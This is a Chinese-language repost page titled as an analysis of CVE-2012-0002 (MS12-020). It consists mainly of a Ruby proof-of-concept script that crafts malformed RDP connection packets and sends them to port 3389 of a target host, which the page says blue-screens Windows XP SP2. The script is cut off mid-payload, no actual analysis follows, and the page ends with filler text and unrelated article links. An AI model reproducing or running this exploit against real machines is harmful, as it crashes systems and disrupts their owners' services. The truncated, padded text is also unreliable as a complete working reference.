【漏洞分析】CVE2012-0002漏洞分析过程详述

本文主要是介绍【漏洞分析】CVE2012-0002漏洞分析过程详述，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

1、漏洞触发

发送攻击脚本后机器蓝屏效果如下：

测试环境：win xp professional sp2

2、ruby脚本源码及分析

#!/usr/bin/env ruby

# ms12-020 PoC

# NOTE: 本测试脚本基于中国民间流传的ChineseShit而写，并且修正了数据包不符合协议的问题

# Author: Joshua J. Drake(jduck)

# From: BlackBap.Org

# Silic Group - 技术自由技术创新技术共享技术原创技术进步

require 'socket'

def send_tpkt(sd, data)

sd.write(make_tpkt(data))

end

def make_tpkt(data)

[

3, # version

0, # reserved

4+ data.length

].pack('CCn') + data

end

def make_x224(data)

[data.length ].pack('C') + data

end

def make_rdp(type, flags, data)

[type, flags, 4 + data.length ].pack('CCv') + data

end

host = ARGV.shift

sd = TCPSocket.new(host, 3389)

pkts1 = [""]

# craft connection request

rdp = make_rdp(1, 0, [ 0 ].pack('V'))

x224_1 = make_x224([

0xe0, # Connection request

0, # ??

0, # SRC-REF

0 # Class : Class 0

].pack('CnnC') + rdp)

pkts1 << make_tpkt(x224_1)

# craft connect-initial

x224_2 = make_x224([

0xf0, # Data / Class 0

0x80 # EOT: True / NR: 0

].pack('CC'))

# mcsCi

target_params = ""+

#"\x02\x01\x00"+ #maxChannelIds

"\x02\x04\x00\x00\x00\x22"+ # maxChannelIds

"\x02\x04\x00\x00\x00\x0a"+ # maxUserIds

"\x02\x04\x00\x00\x00\x00"+ # maxTokenIds

"\x02\x04\x00\x00\x00\x01"+ # numPriorities

"\x02\x04\x00\x00\x00\x00"+ # minThroughput

"\x02\x04\x00\x00\x00\x01"+ # maxHeight

"\x02\x02\xff\xff"+ # maxMCSPDUSize

"\x02\x04\x00\x00\x00\x02" # protocolVersion

min_params = ""+

"\x02\x04\x00\x00\x00\x01"+ # maxChannelIds

"\x02\x04\x00\x00\x00\x01"+ # maxUserIds

"\x02\x04\x00\x00\x00\x01"+ # maxTokenIds

"\x02\x04\x00\x00\x00\x01"+ # numPriorities

"\x02\x04\x00\x00\x00\x00"+ # minThroughput

"\x02\x04\x00\x00\x00\x01"+ # maxHeight

"\x02\x02\x04\x20"+ # maxMCSPDUSize

"\x02\x04\x00\x00\x00\x02" # protocolVersion

max_params = ""+

"\x02\x02\xff\xff"+ # maxChannelIds

"\x02\x02\xfc\x17"+ # maxUserIds

"\x02\x02\xff\xff"+ # maxTokenIds

"\x02\x04\x00\x00\x00\x01"+ # numPriorities

"\x02\x04\x00\x00\x00\x00"+ # minThroughput

"\x02\x04\x00\x00\x00\x01"+ # maxHeight

"\x02\x02\xff\xff"+ # maxMCSPDUSize

"\x02\x04\x00\x00\x00\x02" # protocolVersion

userdata = ""+

#gccCCrq

"\x00\x05\x00\x14"+

"\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+

#clientCoreData

"\x01\xc0"+"\xd8\x00"+ # header (type, len)

"\x04\x00"+"\x08\x00"+ # version

"\x80\x02"+ # desktop width

"\xe0\x01"+ # desktop height

"\x01\xca"+ # color depth

"\x03\xaa"+ # SASSequence

"\x09\x04\x00\x00" + # keyboard layout

"\xce\x0e\x00\x00" + # client build number

#client name

"\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x04\x00\x00\x00"+ # keyboard type

"\x00\x00\x00\x00"+ # kbd subType

"\x0c\x00\x00\x00"+ # kbd FuncKey

#imeFileName

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x01\xca"+ # postBeta2ColorDepth

"\x01\x00"+ # clientProductId

"\x00\x00\x00\x00" + # serialNumber

"\x10\x00"+ # highColorDepth

"\x07\x00"+ # supportedColorDepths

"\x01\x00"+ # earlyCapabilityFlags

#clientDigProductId -poc has: "00000-000-0000000-00000"

"\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+

"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+

"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00"+ # connectionType

"\x00"+ # pad1octet

"\x00\x00\x00\x00"+ # serverSelectedProtocol

"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth

"\x0d\x00\x00\x00"+ # desktopPhysicalHeight

"\x00\x00\x00\x00"+ # reserved

#clientSecurityData

"\x02\xc0"+"\x0c\x00"+ # header (type, len)

这篇关于【漏洞分析】CVE2012-0002漏洞分析过程详述的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

【漏洞分析】CVE2012-0002漏洞分析过程详述

1、漏洞触发

相关文章

Linux进程CPU绑定优化与实践过程

Spring boot整合dubbo+zookeeper的详细过程

Linux下进程的CPU配置与线程绑定过程

MySQL中的LENGTH()函数用法详解与实例分析

Android kotlin中 Channel 和 Flow 的区别和选择使用场景分析

怎样通过分析GC日志来定位Java进程的内存问题

Java进程异常故障定位及排查过程

SpringBoot整合liteflow的详细过程

Java中调用数据库存储过程的示例代码

MySQL中的InnoDB单表访问过程